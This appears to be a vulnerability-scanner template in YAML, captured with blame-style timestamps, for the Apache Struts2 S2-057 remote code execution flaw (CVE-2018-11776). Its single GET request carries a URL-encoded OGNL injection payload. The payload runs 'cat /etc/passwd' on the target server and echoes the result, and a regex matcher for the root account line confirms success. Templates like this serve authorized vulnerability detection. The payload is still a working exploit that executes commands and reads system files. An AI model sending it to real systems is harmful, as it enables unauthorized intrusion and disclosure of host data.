2021-02-24 04:29:30 +00:00
|
|
|
id: CVE-2018-11776
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Apache Struts2 S2-057 RCE
|
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
|
|
|
reference: https://github.com/jas502n/St2-057
|
2021-03-18 07:54:36 +00:00
|
|
|
tags: cve,cve2018,apache,rce,struts
|
2021-02-24 04:29:30 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
2021-03-05 20:44:21 +00:00
|
|
|
|
2021-02-24 04:29:30 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|